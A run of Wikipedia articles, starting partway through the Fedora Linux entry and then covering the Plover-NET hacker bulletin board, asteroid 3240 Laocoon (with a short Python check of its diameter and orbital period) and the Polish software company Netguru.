variety of security policies, including mandatory access controls, which Fedora adopted early on. Fedora provides a hardening wrapper and does hardening for all of its packages by using compiler features such as position-independent executables (PIE). Software Fedora Linux comes preinstalled with a wide range of software such as LibreOffice and Firefox. Additional software is available from the software repositories and can be installed using the DNF package manager or GNOME Software. Additionally, extra repositories can be added to the system, so that software not available in Fedora Linux can be installed easily. 
Software that is not available via official Fedora repositories, either because it doesn't meet Fedora's definition of free software or because its distribution may violate US law, can be installed using third-party repositories. Popular third-party repositories include RPM Fusion free and non-free repositories. Fedora also provides users with an easy-to-use build system for creating their own repositories called Copr. Since the release of Fedora 25, the operating system defaults to the Wayland display server protocol, which replaced the X Window System. System installer Fedora Linux uses Anaconda as the system installer. Editions Beginning with Fedora version 30, it is available in five editions, three editions are primary and two editions are secondary as of version 35. Primary Workstation It targets users who want a reliable, user-friendly, and powerful operating system for their laptop or desktop computer. It comes with GNOME by default but other desktops can be installed or can be directly installed as Spins. Server Its target usage is for servers. It includes the latest data center technologies. This edition doesn't come with a desktop environment, but one can be installed. From Fedora 28, Server Edition will deliver Fedora Modularity, adding support for alternative update streams for popular software such as Node.js and Go. IoT Images of Fedora Linux tailored to running on Internet of Things devices. Secondary CoreOS The successor of Fedora Atomic Host (Project Atomic) and Container Linux after Fedora 29, it provides a minimal image of Fedora Linux which includes just the bare essentials. It is meant for deployment in cloud computing. It provides Fedora CoreOS images which are optimized minimal images for deploying containers. CoreOS replaced the established Container Linux when it was merged with Project Atomic after its acquisition by Red Hat in January 2018. Silverblue An immutable desktop operating system. Every Silverblue installation is identical to every other installation of the same version, and it never changes as it is used. The immutable design is intended to make the operating system more stable, less prone to bugs, and easier to test and develop, and an excellent platform for containerized applications as well as container-based software development. Applications and containers are kept separate from the host system. OS updates are fast and there is no installation stage. With Silverblue, it is also possible to roll back to the previous version of the operating system, if something goes wrong. Fedora Silverblue was previously known as Fedora Atomic Workstation. The descriptive name for this product is ​image-mode container-based Fedora Workstation based on rpm-ostree, which is clear but unsuitable for branding. Therefore, it was named Silverblue. The long-term goal for this effort is to transform Fedora Workstation into an image-based system where applications are separate from the OS, and updates are atomic. Red Hat engineers have built most of the pieces for this new desktop over the last few years: OSTree, flatpak, flathub, rpm-ostree, and gnome-software. The ultimate goal of this effort always was to create an image-based variant of the Workstation that is at feature-parity and better suited for certain use cases than the traditional variant. Until the end of 2017, the Silverblue team slowly completed necessary pieces for the vision of an immutable image-based OS with independent applications: Wayland, flatpak, and rpm-ostree support in GNOME Software, etc. 
During the same time, Project Atomic has added new features like package layering to rpm-ostree and added rpm-ostree support to anaconda. Labs Similar to Debian blends, the Fedora Project also distributes custom variations of Fedora Linux called Fedora Labs. These are built with specific sets of software packages, targeting specific interests such as gaming, security, design, robotics, and scientific computing (that includes SciPy, Octave, Kile, Xfig and Inkscape). The Fedora AOS (Appliance Operating System) was a specialized spin of Fedora Linux with reduced memory footprint for use in software appliances. Appliances are pre-installed, pre-configured, system images. This spin was intended to make it easier for anyone (developers, independent software vendors (ISV), original equipment manufacturers (OEM), etc.) to create and deploy virtual appliances. Spins and Remixes The Fedora project officially distributes different variations called "Fedora Spins" which are Fedora Linux with different desktop environments (GNOME is the default desktop environment). The current official spins, as of Fedora 34, are KDE, Xfce, LXQt, MATE-Compiz, Cinnamon, LXDE, SOAS, and i3. In addition to Spins, which are official variants of the Fedora system, the project allows unofficial variants to use the term "Fedora Remix" without asking for further permission, although a different logo (provided) is required. Architectures x86-64, ARM AArch64 and ARM-hfp are the primary architectures supported by Fedora. As of release 35, Fedora also supports IBM Power64le, IBM Z ("s390x"), MIPS-64el, MIPS-el and RISC-V as secondary architectures. Fedora 28 was the last release that supported ppc64 and users are advised to move to the little endian ppc64le variant. Fedora 36 will be the last release with support for ARM-hfp. Alternatives The Fedora Project also distributes several other versions with less use cases than mentioned above, like network installers and minimal installation images. They are intended for special cases or expert users that want to have custom installations or configuring Fedora from scratch. In addition, all acceptable licenses for Fedora Linux (including copyright, trademark, and patent licenses) must be applicable not only to Red Hat or Fedora, but also to all recipients downstream. This means that any "Fedora-only" licenses, or licenses with specific terms that Red Hat or Fedora meets but that other recipients would not are not acceptable (and almost certainly non-free, as a result). History The name of Fedora derives from Fedora Linux, a volunteer project that provided extra software for the Red Hat Linux distribution, and from the characteristic fedora hat used in Red Hat's "Shadowman" logo. Warren Togami began Fedora Linux in 2002 as an undergraduate project at the University of Hawaii, intended to provide a single repository for well-tested third-party software packages so that non-Red Hat software would be easier to find, develop, and use. The key difference between Fedora Linux and Red Hat Linux was that Fedora's repository development would be collaborative with the global volunteer community. Fedora Linux was eventually absorbed into the Fedora Project, carrying with it this collaborative approach. Fedora Linux was launched in 2003, when Red Hat Linux was discontinued. Red Hat Enterprise Linux was to be Red Hat's only officially supported Linux distribution, while Fedora was to be a community distribution. Red Hat Enterprise Linux branches its releases from versions of Fedora. 
Before Fedora 7, Fedora was called Fedora Core after the name of one of the two main software repositories - Core and Extras. Fedora Core contained all the base packages that were required by the operating system, as well as other packages that were distributed along with the installation CD/DVDs, and was maintained only by Red Hat developers. Fedora Extras, the secondary repository that had been included since Fedora Core 3, was community-maintained and not distributed along with the installation CD/DVDs. Upon the release of Fedora 7, the distinction between Fedora Core and Fedora Extras was eliminated. Since the release of Fedora 21, as an effort to modularize the Fedora distribution and make development more agile, three different versions are available: Workstation, focused on the personal computer, Server and Atomic for servers, Atomic being the version meant for cloud computing. Fedora is a trademark of Red Hat, Inc. Red Hat's application for trademark status for the name "Fedora" was disputed by Cornell University and the University of Virginia Library, creators of the unrelated Fedora Commons digital repository management software. The issue was resolved and the parties settled on a co-existence agreement that stated that the Cornell-UVA project could use the name when clearly associated with open source software for digital object repository systems and that Red Hat could use the name when it was clearly associated with open source computer operating systems. In April 2020, project leader Matthew Miller announced that Fedora Workstation would be shipping on select new ThinkPad laptops, thanks to a new partnership with Lenovo. Development and community Development of the operating system and supporting programs is headed by the Fedora Project, which is composed of a community of developers and volunteers, and also Red Hat employees. The Council is the top-level community leadership and governance body. Other bodies include the Fedora Engineering Steering Committee, responsible for the technical decisions behind the development of Fedora, and Fedora Mindshare Committee which coordinates outreach and non-technical activities, including representation of Fedora Worldwide e.g.: Ambassadors Program, CommOps team and Marketing, Design and Websites Team. Releases Fedora has a relatively short life cycle: version is supported only until 1 month after version +2 is released and with approximately 6 months between most versions, meaning a version of Fedora is usually supported for at least 13 months, possibly longer. Fedora users can upgrade from version to version without reinstalling. The current release is Fedora 35, which was released on 2 November 2021. Rawhide Rawhide is the development tree for Fedora. This is a copy of a complete Fedora distribution where new software is added and tested, before inclusion in a later stable release. As such, Rawhide is often more feature rich than the current stable release. In many cases, the software is made of CVS, Subversion or Git source code snapshots which are often actively developed by programmers. Although Rawhide is targeted at advanced users, testers, and package maintainers, it is capable of being a primary operating system. Users interested in the Rawhide branch often update on a daily basis and help troubleshoot problems. Rawhide users do not have to upgrade between different versions as it follows a rolling release update model. 
See also Fedora Project Fedora Media Writer Rocky Linux Red Hat Enterprise Linux Anaconda, the system installer used by Fedora ABRT References External links Fedora Magazine ARM Linux distributions Fedora Project IA-32 Linux distributions LXQt Power ISA Linux distributions PowerPC Linux distributions RPM-based Linux distributions X86-64 Linux distributions Linux distributions
43070215
https://en.wikipedia.org/wiki/Plover-NET
Plover-NET
Plover-NET, often misspelled Plovernet, was a popular bulletin board system in the early 1980s. It was hosted in New York state and originally owned and operated by a teenage hacker who called himself Quasi-Moto, who was a member of the short-lived yet famed Fargo 4A phreak group. The bulletin board system attracted a large group of hackers, telephone phreaks, engineers, computer programmers, and other technophiles, at one point reaching over 600 users, until LDX, a long distance phone company, began blocking all calls to its number (516-935-2481). Naming and creation The name Plover-NET came from a conversation between Quasi-Moto and Greg Schaefer. The topic of computer games came up, and one of them, the 'Extended Adventure' game, which was based on the 'Original Adventure' fantasy computer game, was mentioned. This game was available on CompuServe, and during game play the magic word PLOVER had to be used. Past sysops of Plover-NET included Eric Corley, under the pseudonym Emmanuel Goldstein, and Lex Luthor, the founder of the notorious hacker group Legion of Doom. Quasi-Moto personally recounted the creation of Plover-NET: "I met Lex in person while we lived in Florida during the Fall of 1983 after corresponding via email on local phreak boards. I was due to move to Long Island, New York (516 Area Code) soon after and asked him about starting up a phreak BBS. He agreed to help and flew up during his Christmas break from school in late December 1983. We worked feverishly for a couple of days to learn the GBBS Bulletin Board software which was to run on my Apple with a 300 baud Hayes micoSLOWdom %micromodem% and make modifications as necessary. The system accepted its first phone call from Lex in the first week of January 1984 and it became chronically busy soon after." Legion of Doom Lex Luthor, under the age of 18 at the time, was a COSMOS (Central System for Mainframe Operations) expert when he operated Plover-NET. At the time there were a few hacking groups in existence, such as Fargo-4A and Knights of Shadow. Lex was admitted into KOS in early 1984, but after making a few suggestions about new members, and having them rejected, Lex decided to put up an invitation-only BBS and to start forming a new group. Starting around May 1984 he began using his position on Plover-NET to contact people he had seen on Plover-NET and people he knew personally who possessed the kind of superior knowledge that the group he envisioned should have. He was never considered to be the "mastermind of the Legion of Doom", more the cheerleader and recruiting officer. 2600 Luthor met 2600 Magazine editor Emmanuel Goldstein on the Pirates Cove, another 516 pirate/phreak BBS. He invited Goldstein onto Plover-NET, and it was not long before it became an 'official' 2600 BBS of sorts. When a user logged off the system, a plug for 2600 was displayed with its subscription prices and addresses. Operations The board initially ran on three Apple disk drives with a capacity of 143 KB each. After a few months of operation, New York hacker Paul Muad'Dib appeared at a TAP meeting being held at "Eddies" in Greenwich Village with a RANA Elite III disk drive in hand. The RANA Elite III had a capacity of about 600 KB, which brought the total storage capacity of the BBS to just over one megabyte, fairly large for a phreak board in those days. They gladly accepted the donation but did not ask how he obtained the disk drive. 
The RANA was later passed on to Lex which he used to house his extensive collection of phreak philes that were available to Legion of Doom BBS users. The location of the overworked RANA is currently unknown although Lex believes he sent it back to Muad'Dib around 1986. In early 1985 Plover-NET officially closed permanently after Quasi-Moto moved back to Florida and was unable to gain traction in re-establishing the bulletin board when he put it back up after moving. References Bulletin board systems Groupware Hacker groups Internet culture Internet forums Online chat Phreaking Pre–World Wide Web online services Social information processing Underground computer groups
16465557
https://en.wikipedia.org/wiki/3240%20Laocoon
3240 Laocoon
3240 Laocoon is a carbonaceous Jupiter trojan from the Trojan camp, approximately 51 kilometers in diameter. It was discovered on 7 November 1978, by American astronomers Eleanor Helin and Schelte Bus at Palomar Observatory in California. The D-type asteroid belongs to the 100 largest Jupiter trojans and has a rotation period of 11.3 hours. It was named after Laocoön from Greek mythology. Classification and orbit Laocoon resides in the Trojan camp at Jupiter's L5 Lagrangian point, which lies 60° behind the gas giant's orbit. It is also a non-family asteroid of the Jovian background population. It orbits the Sun at a distance of 4.6–5.9 AU once every nearly 12 years (4,375 days; semi-major axis of 5.23 AU). Its orbit has an eccentricity of 0.13 and an inclination of 2° with respect to the ecliptic. The asteroid was first observed at Crimea–Nauchnij in September 1976, extending the body's observation arc by two years prior to its official discovery at Palomar. Physical characteristics Laocoon has been characterized as a D-type asteroid by the Pan-STARRS survey and in the SDSS-based taxonomy. It has a V–I color index of 0.88. Lightcurve In April 1996, Laocoon was observed by Italian astronomer Stefano Mottola using the now decommissioned Bochum 0.61-metre Telescope at ESO's La Silla Observatory in Chile. The lightcurve gave a rotation period of approximately 11.3 hours. Diameter and albedo According to the NEOWISE mission of NASA's Wide-field Infrared Survey Explorer, the Jovian asteroid measures 51.7 kilometers in diameter and its surface has an albedo of 0.060, while the Collaborative Asteroid Lightcurve Link assumes a standard albedo for a carbonaceous asteroid of 0.057 and calculates a diameter of 50.8 kilometers with an absolute magnitude of 10.2. Naming This minor planet was named after the Trojan priest Laocoön from Greek mythology. He and both his sons were killed by serpents sent by the gods because he tried to expose the Greeks' deception of the Trojan Horse. The official naming citation was published by the Minor Planet Center on 7 September 1987. See also Laocoön (El Greco) References External links Asteroid Lightcurve Database (LCDB), query form Dictionary of Minor Planet Names, Google books Discovery Circumstances: Numbered Minor Planets (1)-(5000) – Minor Planet Center Asteroid 3240 Laocoon at the Small Bodies Data Ferret 003240 Discoveries by Eleanor F. Helin Discoveries by Schelte J. Bus Minor planets named from Greek mythology Named minor planets 19781107
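The diameter quoted from the Collaborative Asteroid Lightcurve Link can be reproduced with the standard conversion between absolute magnitude (H), geometric albedo and diameter, D = (1329 km / √p_V) × 10^(−H/5), and the orbital period follows from Kepler's third law. The Python sketch below applies these textbook relations to the values given in the article (albedo 0.057, absolute magnitude 10.2, semi-major axis 5.23 AU); it is an illustrative check, not code used by any of the cited surveys.

```python
import math

def asteroid_diameter_km(albedo: float, abs_magnitude: float) -> float:
    """Standard conversion from geometric albedo and absolute magnitude H
    to diameter in kilometres: D = 1329 / sqrt(p_V) * 10**(-H / 5)."""
    return 1329.0 / math.sqrt(albedo) * 10 ** (-abs_magnitude / 5)

# Values quoted in the article for 3240 Laocoon (CALL assumptions).
print(round(asteroid_diameter_km(albedo=0.057, abs_magnitude=10.2), 1))  # ~50.8 km

# Kepler's third law: orbital period in years from the semi-major axis in AU.
semi_major_axis_au = 5.23
print(round(semi_major_axis_au ** 1.5, 2))  # ~11.96 years, i.e. nearly 12 years
```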
57918197
https://en.wikipedia.org/wiki/Netguru
Netguru
Netguru is a Polish software development and software consultancy company founded in 2008. Headquartered in Poznań, Poland, it is a globally operating business, with local offices including Warsaw, Kraków, Wrocław, Gdańsk and Białystok. It provides software design and product design for both early-stage startups and corporations. Since 2013, Netguru has declared yearly growth of nearly 100 percent. It has landed three times in Deloitte's Technology Fast 50 Central Europe ranking, and twice on the "FT 1000", the Financial Times list of the fastest-growing companies in Europe. In 2016, Netguru reached PLN 28.2M of income and PLN 5.1M of net profit, closed 2017 with a turnover of PLN 40M, and in 2018 doubled it to around PLN 80M. History Founding years Netguru was founded in Poznań, Poland by Wiktor Schmidt (an automation and robotics student at the Poznań University of Technology), Jakub Filipowski (a web designer and philosophy student at the Adam Mickiewicz University in Poznań), and Adam Zygadlewicz (an e-commerce entrepreneur), who met thanks to the popularity of Filipowski's blog about the internet, Yashke.com. The three opened the first coworking space in Poland in a rented office in central Poznań, where they developed websites together. Since 2007, through their own foundation, Fundacja Polak 2.0, they also organized the first BarCamp community meetings for innovation enthusiasts in Poland, along with further events: the International Startup Fair Democamp, the ShopCamp workshops, and the Hackfest. On May 8, 2008, Schmidt, Filipowski and Zygadlewicz registered their software development business as Netguru. Their first contracts were a Web 2.0 travel portal, Kolumber.pl, for the media publisher Agora, and an employer relations portal for Bank Zachodni WBK. Netguru also developed its own microblogging social platform, a charity service, and a recruitment support tool, HumanWay, which received awards at the startup competitions Seedcamp Warsaw and Aulery. Besides functional development and community management, the company specialized in consulting and market analysis. Since September 2007, Netguru has documented its portfolio and the web development industry on an official blog. In September 2010, Zygadlewicz announced the first coworking space for startups and freelance developers in Warsaw. In July 2011, Filipowski, along with entrepreneurs Borys Musielak and Anna Walkowska, moved their businesses together into a mansion in Żoliborz, establishing Reaktor, which evolved into the first networking hub in Poland and a venue for the Warsaw startup scene. Filipowski and Schmidt contributed a famed article to the internet website Antyweb, "There Will Be No More 'Polish Equivalents'", about the web services Allegro, Gadu-Gadu, and Nasza Klasa as local copycats of eBay, ICQ, and Classmates.com, respectively. The article's punch line: "Let's get to work, get rid of complexes, and create models with a global or at least pan-European potential". Focus on web development From 2012, Netguru has been developing applications and platforms solely in Ruby on Rails. In 2013, HumanWay was acquired by the recruitment house Grupa Pracuj. Zygadlewicz exited Netguru, while Schmidt and Filipowski focused entirely on web applications for British, American, and German startups. In 2014, Netguru became a partner for Spree Commerce. At the time, its portfolio included the market research provider GlobalWebIndex and the language-learning platform Babbel. 
In 2015, Netguru implemented a mobile app for a media marketplace Transterra Media, which allows news outlets to manage and publish pre-produced videos. Netguru formed a team of product designers working with IKEA and Volkswagen. The team also created a personal assistant system for a domestic robot. International expansion In 2014, Netguru moved onto Israeli and the Middle East markets, to support entrepreneurs from across the UAE & the MENA regions. In 2015, the company joined the London fintech community. In 2016, it created a mobile bicycle-sharing platform for Citi Bike. And in 2017, it developed Helpr which connects British social care workers with care recipients. In 2016, Netguru recorded an increase in revenues and growth, with no investment support – over PLN 30M (60% year-over-year growth); in 2017, about PLN 40M (), and in 2018, around PLN 80M (). In 2013, the company had about 50 employees; in 2016, over 300, and in 2018, 500 employees around Poland. Between 2016–2018, Netguru reached an EBITDA margin of 15%. Since 2017, Netguru has been developing its business consulting expertise, prototyping products, and building marketing strategies. It has helped large organisations to adopt business agility practices, and innovations with software robots. On June 3, 2019, Netguru's chief operating officer Marek Talarczyk was named the new CEO, with Schmidt including the position of executive chairman, and Małgorzata Madalińska-Piętka joining the board as chief financial officer. Main activities Netguru specializes in developing front-end and back-end web applications, mobile applications, product design, and consulting. According to its tagline, the company "builds digital products that let people do things differently". Its portfolio includes SaaS marketplaces, e-commerce, big data systems, trading systems, and social networks. Machine Learning In May 2018, during a Microsoft hackathon in Prague, Netguru (along with MicroscopeIT) launched a deep-learning image-recognition application that solved segmentation with neural networks. Netguru also partnered with the domestic robotic manufacturer Temi, on building the robotics middleware for the consumer assistant robot, using natural language processing. Other initiatives In 2010, Netguru developers created an online platform for the foundation Apps for Good, that allows cooperation of teachers, students and experts in schools in the United States, Spain, Portugal, and Poland. Since 2017, Netguru has conducted workshops based on design-thinking sprints developed by Google, which are aimed to answer critical business questions through design, prototyping, and testing ideas with customers, to reduce the risk of bringing a new product, service, or feature to the market. Mergers and acquisitions In December 2017, in its first transaction, Netguru took over a team of developers and designers from the Internet-of-things company Vorm. In May 2018, Netguru merged with the IT support and DevOps provider ITTX, and in July 2018, it acquired the software house Bitcraft. Original publications In 2016, Netguru compiled Project Management Tactics for Pros, an e-book with guidance on IT projects, including preparation and budget. In 2018, Netguru published Design Process for Pros, a live e-book actively curated by the designers community, with a set of best practices in web design. Another guide, From Concept to Completion (2018), is an Agile software consulting walk-through, for understanding software development processes and tried-and-true techniques. 
Netguru collaborated with the survey-building service Typeform on State of Stack (2016), a report on the latest trends in web development based on a developer community study. In 2016, Netguru published the London Startup Guide, a guide to tech business events, meetups, business incubators and communities in London. Educational events Between 2017 and 2018, Netguru organized the Netguru Code College summer workshops, in which coding enthusiasts walked through web application building processes with Ruby on Rails professionals. In 2018, Netguru hosted the Disruption Forum in Berlin, a meeting of the fintech community which turned into a regular fintech startup event. Between 2013 and 2015, Netguru coached Ruby on Rails around Poland at free practical workshops aimed at PHP, Java, and .NET developers. Since 2015, Netguru has hosted weekend hackathons at its Poznań headquarters and regular Ruby on Rails student workshops at the Katowice Institute of Information Technologies. Since 2015, Netguru managers have organized regular free project management workshops. Since 2017, Netguru has hosted regular designer events, Dribbble Meetups, along with Swift Poznań and PTAQ meetings. Netguru has also cooperated with universities, been involved in academic life, and run monthly webinars for technology enthusiasts. Trademark registration dispute In 2014, the company filed an application with the European Union Intellectual Property Office to register the EU trade mark "Netguru" in several classes related to computer services. However, it was rejected due to the lack of distinctiveness of the name. The company appealed to the General Court of the European Union, which dismissed the complaint, considering that the combination of the words "net" and "guru" appeared as advertising and did not allow the target public to perceive the sign as an indication of the commercial origin of the goods and services in question. Awards and accolades Netguru is a three-time winner of the Fast 50 Central Europe competition, in which the accounting network Deloitte recognizes and profiles the 50 most dynamic technology companies in the region based on revenue growth over the past five years. Netguru was ranked 5th in 2014 and 2015, and received the third award in 2017. Netguru landed twice on the "FT 1000", the list of Europe's fastest-growing companies according to the Financial Times: in 2017 (ranked 188) and in 2018 (ranked 466). In 2016, the company was included by Forbes in its "Diamonds" list of the most promising companies in Poland. In 2014, Netguru was named among the Top Ruby on Rails Developers by the American market analysis firm Clutch in its Market Leaders report, based on in-depth interviews with clients. Again in August 2017, Clutch named Netguru one of the best outsourcing companies in the industry. In 2018, Schmidt and Filipowski were among the Polish finalists of the Ernst & Young Entrepreneur of the Year Award competition. In 2011, Netguru won the Aulery award as one of the best tech companies with global potential. Schmidt and Filipowski have both been placed twice on Brief magazine's list of The Most Creative in Business: in 2014, ranked 38, and in 2016, ranked 13. In November 2017, Netguru, joined by the software house CashCape, received two awards at Bankathon Berlin for an application explaining the impact of the Payment Services Directive and other regulations. 
References External links Polish companies established in 2008 Companies based in Poznań Information technology companies of Poland Polish brands Software companies of Poland Software companies established in 2008